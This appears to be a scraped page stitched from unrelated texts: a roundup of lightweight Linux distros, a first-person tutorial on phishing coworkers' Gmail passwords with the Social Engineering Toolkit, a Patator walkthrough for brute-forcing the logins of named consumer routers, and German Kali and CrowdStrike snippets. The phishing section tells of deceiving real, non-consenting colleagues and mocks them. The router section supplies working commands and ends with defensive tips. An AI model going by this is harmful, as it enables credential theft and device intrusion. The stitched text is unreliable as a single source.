As a result, they have become too bloated for older machines, even if you manually delete files. Without a healthy dollop of system memory and an extra core or two, these distros may not deliver the best performance.
Thankfully, there are many lightweight distros, trimmed and tweaked by expert hands, which can be used to breathe new life into older hardware.
But there’s one caveat to bear in mind when working with lightweight distros – they usually manage to support ancient kit by cutting away just about everything you take for granted, such as wizards and scripts which make everyday tasks easier.
That said, these lightweight distros are fully capable of reviving older hardware and can even function as a replacement of your current operating system, if you’re willing to adjust to their way of working and install extra programs as necessary.
A featherweight distro designed for desktop useEasy to configureHighly streamlined and nimble distroPlenty of help documentation on hand
Absolute Linux is a lightweight distro designed for desktop use, and as such comes preinstalled with the Firefox browser and LibreOffice suite. It’s based on Slackware 14.2 but unlike its parent OS, aims to make configuration and maintenance as simple as possible.
New versions of Absolute Linux are released roughly once a year. The most recent version (15.0) was made available for download in February 2018. It’s available as a 2GB ISO for 64-bit computers. The OS is still in the beta testing stage so may perform a little unpredictably, as ever with beta software. Whichever version you choose, there’s a massive selection of lightweight applications available.
The installer is text-based so there’s no Live mode, but nevertheless it’s incredibly simple to follow. The way Absolute is structured also means that you can add and remove packages from the install media to create a distro which truly suits you, though you’ll need some time and experience with Linux if you really want to make the most of this feature.
Once installed, Absolute Linux is incredibly nimble. This is ensured through the lightweight IceWM window manager, along with popular apps such as LibreOffice, making this OS perfect for older machines. There’s also plenty of documentation accessible from within the desktop itself to assist new users.
Tiny by name, and most certainly tiny by nature…Incredibly compact distroThree choices of sizeIt’s unsurprisingly barebones
The Core Project offers up the tiniest of Linux distros, shipping three variants on which you can build your own environments. The lightest edition is Core, weighing in at just 11MB, which comes without a graphical desktop – but you can always add one after installation.
If that’s too intimidating, try TinyCore (currently v9.0). The OS is only 16MB in size and offers a choice of FLTK or FLWM graphical desktop environments.
You can also choose to install CorePlus, which measures a relatively hefty 106MB. This spin offers a choice of lightweight window managers such as IceWM and FluxBox. CorePlus also includes support for Wi-Fi and non-US keyboards.
TinyCore saves on size by requiring a wired network connection during initial setup. The recommended amount of RAM is just 128MB. There are 32-bit and 64-bit versions as well as PiCore, which is a build for ARM devices like the Raspberry Pi.
This minimalist distro doesn’t feature many apps. After installation there’s little beyond the Terminal, a basic text editor and a network connection manager. The Control Panel provides quick access to the different configurable parts of the distro such as display, mouse, network, etc. Use the graphical package manager ‚Apps‘ to install additional software such as multimedia codecs.
A neat spin on the popular OS for older machinesUbuntu but slimmed downUses nifty lightweight appsCompatible with Ubuntu repositories
The ‚L‘ in Lubuntu stands for lightweight, and it unashamedly appeals to those Ubuntu users who are looking for an OS which requires fewer resources than most modern distros, but doesn’t force you to compromise on your favourite apps.
Lubuntu is primarily designed for older machines. The default desktop is based on LXQt, which is far less resource hungry than mainstream Ubuntu’s Gnome 3 desktop. It comes with a plethora of office, internet, multimedia and graphics apps, along with a wide assortment of useful tools and utilities.
As a lightweight distro, Lubuntu focuses on being fast and energy efficient. It features alternative and less resource intensive apps where possible. The most recent releases have also reverted back to using LibreOffice rather than Abiword for word processing.
This doesn’t mean that Lubuntu is lacking, though: it’s based on Linux Kernel 5.00 and Ubuntu 18.04, so it’s a proper modern Linux distro – it’s just shed all unnecessary weight, in the manner of a rally car having all but one of its seats removed.
The most recent release of Lubuntu (19.04 – Disco Dingo) has now lowered the minimum required RAM to run the OS to 500MB. However, to ensure smooth running, try to use a machine with at least 1GB of RAM. It’s available in 32-bit and 64-bit incarnations.
The unique selling point of Lubuntu is its compatibility with Ubuntu repositories, which gives users access to thousands of additional packages that can be easily installed using the Lubuntu Software Center.
A lightweight spin on Ubuntu LTSEmphasizes stability and supportGood-looking distroImpressive range of apps
LXLE is a lightweight version of Linux based on the annual Ubuntu LTS (long term support) release. Like Lubuntu, LXLE uses the barebones LXDE desktop environment, but as LTS releases are supported for five years, it emphasises stability and long-term hardware support. The most recent version at the time of writing (16.04.4) is a remaster of the current of version of Ubuntu LTS.
Aimed primarily at reviving older machines, the distro is designed to serve as a ready to use desktop out of the box, specifically tailored to appeal to existing Windows users.
The developers spend a considerable amount of time making all the necessary mods and tweaks to improve performance, but they don’t skimp on niceties. Aesthetics are a key area of focus as evidenced by the hundred wallpapers which are included, along with clones of Windows functions like Aero Snap and Expose.
The distro boasts full featured apps across categories such as internet, sound and video, graphics, office, games, and more. It also includes plenty of useful accessories such as a Terminal-based Weather app and Penguin Pills, which is a graphical frontend for several virus scanners.
Like Lubuntu, LXLE is available as a Live image for 32-bit and 64-bit machines. The hardware requirements are 512MB of system RAM at a minimum, with 1GB recommended.
This compact OS will even run on an old 486 PCOnly needs 16MB of RAM to runHas lots of pre-installed tools despite sizeLast stable version is very old
Damn Small Linux (DSL) lives up to its name in that the install image is barely 50MB. It’s designed specifically for x86 PCs and will run on an ancient 486 CPU with 16MB of RAM. This means it can run fully inside your system memory which can result in phenomenally fast speeds.
DSL is usually run from a USB or CD, or you can do a Debian-style installation to a hard drive if you prefer.
Despite the extremely minimal desktop, you may be surprised at the vast array of tools that come preinstalled. You can surf the web with a choice of three browsers – Dillo, Firefox or the text-based browser Netrik. You can also examine office documents using the Ted word processor and check your email with the minimal Slypheed client. Or indeed sort through your data with the ultra-tiny emelFM file manager.
The latest stable version of DSL (4.4.10) was released in 2008. However, you can update and add new applications using the MyDSL Extension Tool.
Slackware-based distro is incredibly fast and streamlinedCan run direct from system RAMNeat choice of desktop environmentsCan no longer build own custom ISO
This Slackware-based distro is designed to be completely portable and run on removable media such as a USB stick or CD, but can just as easily be installed to a hard disk. The distro is incredibly fast as it’s small enough to run entirely from system RAM.
The unique selling point of Porteus is that it exists in a compressed state (less than 300MB for the Cinammon and MATE editions) and creates the file system on-the-fly. Besides the preinstalled apps, all additional software for the distro comes in the form of modules, making the OS very small and compact.
Porteus is available for 32-bit and 64-bit machines. The distro provides users with the choice of KDE, MATE, Cinnamon, Xfce and LXDE desktop environments when downloading the ISO image.
Unfortunately the option to build your own custom ISO has been removed since we previously looked at Porteus, but the pre-built images offer a decent selection of software and drivers, as well as an excellent selection of tutorials to help you get started.
Keeping things simple and small…Highly flexible distroSuitable for home desktop or office serverAvailable in two variants
This distro’s credo is ‚keep it simple, keep it small‘, and it manages this to great effect. It allows users to mould the distro to serve just about any possible purpose – Vector Linux can be a lightning-fast desktop for home users, and can just as easily be used for running servers, or as the gateway for your office computer.
After a lengthy period, Vector Linux 7.1 was finally officially released in July 2015, and now comes in two flavours: Light and Standard. The difference is in the desktop environment used. Vector Linux Light uses the ultra-efficient IceWM for the desktop environment while the Standard version is powered by Xfce.
This Slackware-based distro tends to favour GTK+ apps such as Pidgin Messenger, but you can use the TXZ package manager to fetch and install additional software.
One of the veterans of the lightweight Linux worldHuge range of appsDifferent versions for differing needsXenialPup edition works with Ubuntu repositories
Puppy Linux is one of the oldest lightweight distros out there. The project has been turning out slim, sleek and fast distros for 15 years now, and offers different versions depending on the underlying environment. Puppy Linux 8.0 (Bionic Pup) is based on Ubuntu Bionic Beaver (18.04).
Puppy Linux developer, Barry Kauler, also manages a sister project named Quirky, a version of Puppy Linux built using the custom tool Woof-CE.
The distro is full of apps, belying its small size – some are quite unconventional, such as Homebank which helps you manage your finances, or Gwhere which is for cataloguing disks. There are also graphical tools to manage Samba shares and set up a firewall, for example. The sheer variety of applications is impressive.
The Bionic Pup edition of Puppy Linux is compatible with Ubuntu’s repositories, giving users access to the parent distro’s vast software collection. The handy QuickPet utility can be used to install some of the most popular apps.
Designed for those who won’t pay for a new version of WindowsAimed at easing migration of Windows usersFeatures a host of familiar appsNot the least demanding distro out there
Linux Lite is based on Ubuntu (currently Long Term Support version 18.04). It is specifically developed to ease Windows users – particularly those with old machines running Windows XP – into the world of Linux.
It features familiar tools like Firefox (with built-in support for Netflix), plus VLC Media Player and LibreOffice are preinstalled. The OS also includes the zRAM memory compression tool which makes it run faster on older machines. There’s also a special ‘Lite Upgrade’ utility.
Despite its name, this distribution isn’t the least resource hungry out there, as it requires both a 1.5GHz processor and at least 1GB of RAM to run smoothly. That said, this shouldn’t be too much to ask of any computer made in the last decade.
Try it on modern hardware and you’ll be amazed at just how quickly it runs. Linux Lite can boot from a Live medium such as a USB stick or CD, or install to your hard drive. It also supports multi-booting so you can keep your existing OS if you wish. The distro is available for both 32-bit and 64-bit systems.
A distro that’s carrying the Crunchbang torch onwardsBlazing fast performanceSmartly configured Openbox window manager
Crunchbang (or #!) was a very popular Debian-derived distro specifically designed to use as few system resources as possible. While it was discontinued in 2013, the community fondly remembered its lightning speed and responded with two Crunchbang-based distros to continue its legacy.
However, one of those successors, Crunchbang++, has now been discontinued. BunsenLabs is still active, though, and its current release (Helium) is based on the latest stable version of Debian featuring a gorgeously configured Openbox window manager and its own repository of core packages.
There’s also a point release option, which is regularly updated if you want to stay on the bleeding-edge. It requires at least 256MB of RAM to run (with 1GB or more recommended).
Humans are the best resource and end-point of security vulnerabilities ever. Social Engineering is a kind of attack targeting human behavior by manipulating and playing with their trust, with the aim to gain confidential information, such as banking account, social media, email, even access to target computer. No system is safe, because the system is made by humans.The most common attack vector using social engineering attacks is spread phishing through email spamming. They target a victim who has a financial account such as banking or credit card information.
Social engineering attacks are not breaking into a system directly, instead it is using human social interaction and the attacker is dealing with the victim directly.
Do you remember Kevin Mitnick? The Social Engineering legend of the old era. In most of his attack methods, he used to trick victims into believing that he holds the system authority. You might have seen his Social Engineering Attack demo video on YouTube. Look at it!
In this post i am going to show you the simple scenario of how to implement Social Engineering Attack in daily life. It is so easy, just follow along the tutorial carefully. I will explain the scenario clearly.
Social Engineering Attack to gain email access
Goal: Gaining email credential account information
Target: My friend. (Really? yes)
Device: Computer or laptop running Kali Linux. And my mobile phone!
Environment: Office (at work)
Tool: Social Engineering Toolkit (SET)
So, based on the scenario above you can imagine that we don’t even need the victim’s device, i used my laptop and my phone. I only need his head and trust, and stupidity too! Because, you know, human stupidity can not be patched, seriously!
In this case we first are going to setup phishing Gmail Account login page in my Kali Linux, and use my phone to be a trigger device. Why i used my phone? I will explain below, later.
Fortunately we are not gonna install any tools, our Kali Linux machine has pre-installed SET (Social Engineering Toolkit), That’s all we need. Oh yeah, if you don’t know what is SET is, i will give you the background on this toolkit.
Alright that was enough let’s do the practice. Before we conduct the social engineering attack, we need to set up our phising page first. Here, i am sitting down on my desk, my computer (running Kali Linux) is connected to the internet the same Wi-Fi network as my mobile phone (i am using android).
STEP 1. SETUP PHISING PAGE
Setoolkit is using Command Line interface, so don’t expect ‘clicky-clicky’ of things here. Open up terminal and type:~# setoolkit
You will see the welcome page at the top and the attack options at the bottom, you should see something like this.
Yes, of course, we are going to perform Social Engineering Attacks, so choose number 1 and hit ENTER.
And then you will be displayed the next options, and choose number 2. Website Attack Vectors. Hit ENTER.
Next, we choose number 3. Credential Harvester Attack Method. Hit Enter.
Further options are narrower, SET has pre-formatted phising page of popular websites, such Google, Yahoo, Twitter and Facebook. Now choose number 1. Web Templates.
Because, my Kali Linux PC and my mobile phone were in the same Wi-Fi network, so just input the attacker (my PC) local IP address. And hit ENTER.
PS: To check your device IP address, type: ‘ifconfig’
Alright so far, we have set our method and the listener IP address. In this options listed pre-defined web phising templates as i mentioned above. Because we aimed Google account page, so we choose number 2. Google. Hit ENTER.
Now, SET starts my Kali Linux Webserver on port 80, with the fake Google account login page. Our setup is done. Now i am ready walking into my friends room to login into this phishing page using my mobile phone.
STEP 2. HUNTING VICTIMS
The reason why i am using mobile phone (android)? Let see how the page displayed in my built-in android browser. So, i am accessing my Kali Linux webserver on 192.168.43.99 in the browser. And here is the page:
See? It looks so real, there are no security issues displayed on it. The URL bar showing the title instead the URL itself. We know the stupid will recognize this as the original Google page.
So, i bring my mobile phone, and walk into my friend, and talk to him as if i failed to login to Google and act if I am wondering if Google crashed or errored. I give my phone and ask him to try to login using his account. He doesn’t believe my words and immediately begins typing in his account information as if nothing will happen badly here. Haha.
He already typed all the required forms, and let me to click the Sign in button. I click the button… Now It is loading… And then we got Google search engine main page like this.
PS: Once the victim clicks the Sign in button, it will send the authentication information to our listener machine, and it is logged.
Nothing is happening, i tell him, the Sign In button is still there, you failed to login though. And then i am opening again the phising page, while another friend of this stupid coming to us. Nah, we got another victim.
Until i cut the talk, then i go back to my desk and check the log of my SET. And here we got,
Goccha… I pwnd you!!!
I am not good at story telling (thats the point), to sum up the attack so far the steps are:
Router gateways are responsible for protecting every aspect of a network’s configuration. With unfettered access to these privileged configurations, an attacker on a compromised Wi-Fi network can perform a wide variety of advanced attacks.
With access to the router’s gateway and complete control over the configurations, a hacker in this position of power can perform a variety of attacks. They could do any of the following, and then some.
perform DNS poisoning attacks
modify or manipulate forwarding ports
reset the gateway password
reset the Wi-Fi name and password
install a malicious firmware
modify or delete login and system logs
modify or disable the firewall
Patator, like Hydra and Medusa, is a command-line brute-forcing tool. The developers have tried to make it more reliable and flexible than its predecessors. My favorite feature of Patator is the raw_request module that allows penetration testers to brute-force HTTP logins much like Burp’s Intruder module.
A General Outline for an Attack
To demonstrate, I’m going to show how to use Patator against two popular consumer routers found on Amazon. Not all router gateways handle authentication the same. I’ll show a kind of general procedure to follow when performing such attacks.
Capture a login request: A single login attempt is captured in Burp to analyze the request.
Identify the parameters: It’s important to identify where the dynamic parameters (i.e., username and password) are stored in the request as some login forms handle authentication differently.
Modify and save the request: After the parameters have been identified, insert a placeholder into the request to help Patator iterate through the desired wordlist.
Generate a targeted wordlist: A targeted wordlist containing 10,000 passwords is usually more effective than a wordlist of 10 million random passwords. Some authentication methods involve hashing or encoding the credentials in the client’s browser before making the request. The wordlist will need to reflect this as needed.
Identity and filter failed requests: With modern routers, very rarely will a successful login attempt makes itself known. Understanding and filtering HTTP status codes play a big part in identifying the difference between a failed and successful login attempt.
Now, a word of caution: Patator isn’t very beginner-friendly, so there’s a bit of a learning curve with the syntax that can take some getting used to. Before proceeding, you should have a general understanding of HTTP requests, HTTP status codes, and some experience with Burp’s Intruder module.
Install Patator in Kali Linux
Use the following apt-get command to install Patator in Kali.
~# apt-get update && apt-get install patator
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2
libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-openssl
python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Need to get 43.9 MB of archives.
After this operation, 192 MB of additional disk space will be used.
Do you want to continue? [Y/n]
When that’s done, use the –help option to verify Patator was successfully installed and view the available modules.
As stated, we’ll focus on the http_fuzz module, designed to brute-force HTTP logins as well as perform various types of web-based injection attacks (e.g., fuzzing). View the available http_fuzz options using the following command.
~# patator http_fuzz --help
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: http_fuzz <module-options ...> [global-options ...]
http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'
url : target url (scheme://host[:port]/path?query)
body : body data
header : use custom headers
method : method to use [GET|POST|HEAD|...]
raw_request : load request from file
scheme : scheme [http|https]
auto_urlencode: automatically perform URL-encoding [1|0]
user_pass : username and password for HTTP authentication (user:pass)
auth_type : type of HTTP authentication [basic | digest | ntlm]
follow : follow any Location redirect [0|1]
max_follow : redirection limit 
accept_cookie : save received cookies to issue them in future requests [0|1]
proxy : proxy to use (host:port)
proxy_type : proxy type [http|socks4|socks4a|socks5]
resolve : hostname to IP address resolution to use (hostname:IP)
ssl_cert : client SSL certificate file (cert+key in PEM format)
timeout_tcp : seconds to wait for a TCP handshake 
timeout : seconds to wait for a HTTP response 
before_urls : comma-separated URLs to query before the main request
before_header : use a custom header in the before_urls request
before_egrep : extract data from the before_urls response to place in the main request
after_urls : comma-separated URLs to query after the main request
max_mem : store no more than N bytes of request+response data in memory [-1 (unlimited)]
persistent : use persistent connections [1|0]
--version show program's version number and exit
-h, --help show this help message and exit
-x arg actions and conditions, see Syntax below
--start=N start from offset N in the wordlist product
--stop=N stop at offset N
--resume=r1[,rN]* resume previous run
-e arg encode everything between two tags, see Syntax below
-C str delimiter string in combo files (default is ':')
-X str delimiter string in conditions (default is ',')
failures cannot be ignored with -x (this is by design
to avoid false negatives) this option overrides this
--rate-limit=N wait N seconds between each test (default is 0)
--timeout=N wait N seconds for a response before retrying payload
(default is 0)
--max-retries=N skip payload after N retries (default is 4) (-1 for
-t N, --threads=N number of threads (default is 10)
-l DIR save output and response data into DIR
-L SFX automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
(DIR defaults to '/tmp/patator')
-d, --debug enable debug messages
actions := action[,action]*
action := "ignore" | "retry" | "free" | "quit" | "reset"
conditions := condition=value[,condition=value]*
condition := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep" | "clen"
ignore : do not report
retry : try payload again
free : dismiss future similar payloads
quit : terminate execution now
reset : close current connection in order to reconnect next time
code : match status code
size : match size (N or N-M or N- or -N)
time : match time (N or N-M or N- or -N)
mesg : match message
fgrep : search for string in mesg
egrep : search for regex in mesg
clen : match Content-Length header (N or N-M or N- or -N)
For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'
tag := any unique string (eg. T@G or _@@_ or ...)
encoding := "hex" | "unhex" | "b64" | "md5" | "sha1" | "url"
hex : encode in hexadecimal
unhex : decode from hexadecimal
b64 : encode in base64
md5 : hash in md5
sha1 : hash in sha1
url : url encode
For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64
Please read the README inside for more examples and usage information.
1Attacking the Medialink AC1200 Router
The first router being attacked is the Medialink AC1200. It’s currently one of Amazon’s top choices for consumer router’s and quite popular.
That tells us that the wordlist used when brute-forcing the gateway must be in MD5 format. With this particular router, at the gateway, there’s no available field for username input. We can see from the captured data that the „admin“ username is embedded into the request. So there’s only one dynamic parameter: the password.
Step 3Modify & Save the Raw Request
Change the hashed password parameter to „FILE0“ within the request. The modification will act as a placeholder in the request that indicates to Patator where to insert the passwords. (The reason for this will be clear in a later step.)
When that’s done, right-click inside the Burp window and select the „Copy to file“ option. Save it to the /tmp directory with the „router_request.txt“ filename.
Step 4Generate a Targeted Wordlist
As we discovered previously, passwords are hashed in the browser before being sent to the router. Patator has a built-in feature to hash passwords, but let’s take this opportunity to learn some Bash password manipulation tricks.
First, download a preferred wordlist. Any generic wordlist will do fine for testing purposes. Use the below wget command to download my wordlist generated by analyzing leaked databases.
With the router_request.txt and the wordlist of hashed passwords, the router’s gateway can be brute-forced with the following Patator command. To stop the brute-force attack at any time, press Control-C on the keyboard.
Hypertext Transfer Protocol (HTTP) status codes, also known as response codes, are issued by web servers to our web browser when we make requests. These codes are a way for web servers to communicate errors to syadmins, web developers, and end-users alike.
Sometimes the 200 („200 OK“) status code is an indication that the server accepted the provided password. In this case, every single login attempt is producing the „200 OK“ response — so it’s actually helping to identify what a failed login attempt looks like.
The „size“ column can also be extremely helpful. It will display the size (in bytes) of the server’s response to the login attempt. It’s returning 20 bytes with every login attempt, so it’s probably safe to assume this byte size indicates a failed login attempt, in which case, it’s safe to omit responses of that size. We can do so by adding the -x ignore:size=20 option and argument.
Now, only one request is displayed, with a size of 3,962 bytes.
There are a few ways of unhashing a discovered password. The passwords in both wordlist.txt and md5_wordlist.txt appear in the same order. The only difference is that one wordlist is in plain text; the other is hashed.
Below, we’ll use nl to prepend a number to every line in the md5_wordlist.txt, then grep for the hash.
A router from the Netgear N300 series is next on the list of targets. It’s also one of Amazon’s top choices for entry-level, consumer Wi-Fi routers.
Step 1Capture a Login Request with Burp
We’ll follow the same procedure as before, starting with capturing the raw request. Navigate to the router’s gateway using a web browser configured to proxy through Burp. Enter the „admin“ and „password“ credentials when prompted.
Step 2Identify the Parameters
Notice this time there isn’t an obvious password= parameter like the Medialink AC1200 router.
The above string isn’t hashed with MD5. While it may appear encrypted or secured in some way, it’s using a simple base64 encoding. The string is decoded using the below command.
The username and password are concatenated into a single string and encoded. This authentication method is called basic HTTP authentication. It should only be used with HTTPS, as an attacker on the network can easily capture the credentials in transit.
Step 3Modify & Save the Raw Request
With the username and password parameters identified, the raw request is modified to include the Patator placeholder („FILE0“) and saved to a local file.
Right-click inside the window and select the „Copy to file“ option. Save it to the /tmp directory with the „router_request.txt“ filename.
Step 4Generate a Targeted Wordlist
Now that we know the kind of authentication parameter being used, a wordlist can be generated specific to the router. Again, Patator has a built-in feature to encode passwords, but string manipulation with Bash is a good skill to learn. It can be applied to other brute-forcing tools, for example.
The below Bash one-liner will use a while loop to iterate through the passwords in the wordlist. Each password will be concatenated into a single string with the username and password converted into base64. All of the encoded strings are appended to the /tmp/base64_wordlist.txt file.
~# while read password; do printf "admin:$password" | base64; done < /tmp/wordlist.txt >>/tmp/base64_wordlist.txt
The encoded passwords can be verified using the below head command to print the first ten lines of the file.
The router’s gateway can be brute-forced with Patator using the router_request.txt and base64_wordlist.txt files. Remember, while in progress, Patator can be stopped at any time by pressing Control-C on the keyboard.
HTTP status codes are split into several categories or „classes.“ The first digit defines the categories, and the following digits are subcategories specific to different types of error messages. For example, the 4xx categories are a class of errors specific to HTTP requests that cannot be fulfilled by the web server, like trying to view a webpage that doesn’t exist. That’s defined as a status „404 Not Found,“ probably one of the most well-known status codes on the internet.
We immediately notice a ton of 401 status codes in the Patator output, which are clear indications of a failed login requests. These are omitted from the output using the -x ignore:code=401 option and argument.
This time, we received only one request with the 200 status code. The size of the response is 622 bytes, more than that of a failed 401 response. It’s a good sign. The login credentials are decoded using the following command.
How to Protect Yourself from Router Gateway Attacks
Regularly updating the firmware will help prevent against exploits and Routersploit attacks. A strong (non-default) password will prevent brute-force attacks performed with Patator.
Update the firmware. Router manufacturers often issue bug and exploit patches. It’s important to keep the router firmware up to date and have it check for updates automatically if possible.
Disable remote administration. Some consumer routers allow for remote access by default. Without knowing it, hackers may find your router on Shodan and seize control of it.
WPA2 encryption. Only use WPA2 encryption. Weaker encryption options like WEP will leave the router extremely vulnerable to attackers.
Change default passwords. Never use the default credentials. In addition to the WPA2 pre-shared key, the admin portal (router gateway) should also be protected by a strong password. It’s the only defensive measure preventing an attacker from discovering default credentials and modifying sensitive settings.
Disable WPS. WPS is featured in most consumer routers and designed to make password-less authentication more convenient. Unfortunately, the feature is usually enabled by default and easily exploited by hackers.
Be persistent. Change your Wi-Fi password every few months. It’s a pain to update the Wi-Fi password for every device on the network, but this tactic will keep hackers guessing — literally. If a hacker has captured the WPA2 handshake and spends several weeks trying to crack the password, changing it will render the captured handshake useless.
Unfortunately, none of the routers I tested support HTTPS when authenticating the admin settings. So an attacker on the network inspecting traffic will be able to passively discover the login password — even if it’s a totally random 42-character password.
Für Penetration-Tests und Sicherheitstests ist Kali Linux ein beliebtes Tool. Wie Sie es installieren, erfahren Sie hier!! Kali Linux auf der Festplatte installieren Laden Sie sich dazu zunächst Kali-Linux für Ihren PC herunter. Nun können Sie ein Programm wie beispielsweise „Etcher“ verwenden, um die ISO auf einem USB-Stick zu installieren. Booten Sie anschließend von diesem Stick und […]
CrowdStrike hat seine Falcon-Plattform um zusätzliche Fähigkeiten zum Schutz von Linux-Systemen erweitert. Zu den neuen Features zählen unter anderem Machine-Learning-basierte Prävention und individuelle sowie dynamische Indicators of Attack (IoAs).
(Quelle: Imagentle / shutterstock.com )Als eines der primären Betriebssysteme für unternehmenskritische Server sind Linux-Systeme immer wieder das Ziel von Cyberkriminellen. Unternehmens-Workloads werden zunehmend in die Cloud migriert, was durch die COVID-19-Pandemie noch zusätzlich beschleunigt wurde.Die sich schnell entwickelnden Cloud-Workloads von heute benötigen eine allumfassende Lösung, die eine tiefgreifende Runtime-Security für Linux-Hosts bietet, egal ob sie in privaten oder öffentlichen Clouds oder Rechenzentren vor Ort laufen. Dazu zählt auch die Absicherung von Workloads in Containern, die auf Linux-Hosts laufen.CrowdStrike Falcon bietet einen plattformzentrierten Ansatz, der diese unterschiedlichen Workloads mit nur einem einzigen Agenten absichert. Der Agent von Falcon ermöglicht Kunden, mithilfe von individuellen IoAs die Verhaltenserkennung und -prävention exakt auf ihre Betriebsumgebung einzustellen.Die Cloud-basierte Machine Learning Engine von CrowdStrike wird kontinuierlich angereichert und verbessert, um eine zeitnahe und zuverlässige Malware-Erkennung zu ermöglichen, ohne dass Signaturdateien verwaltet und aktualisiert werden müssen. Mehr als die Hälfte aller CrowdStrike-Kunden vertraut beim Schutz ihrer Cloud-Workloads auf die komplexitätsfreie Nutzererfahrung der Falcon-Plattform und kann somit auf zusätzliche Punkt-Produkte verzichten.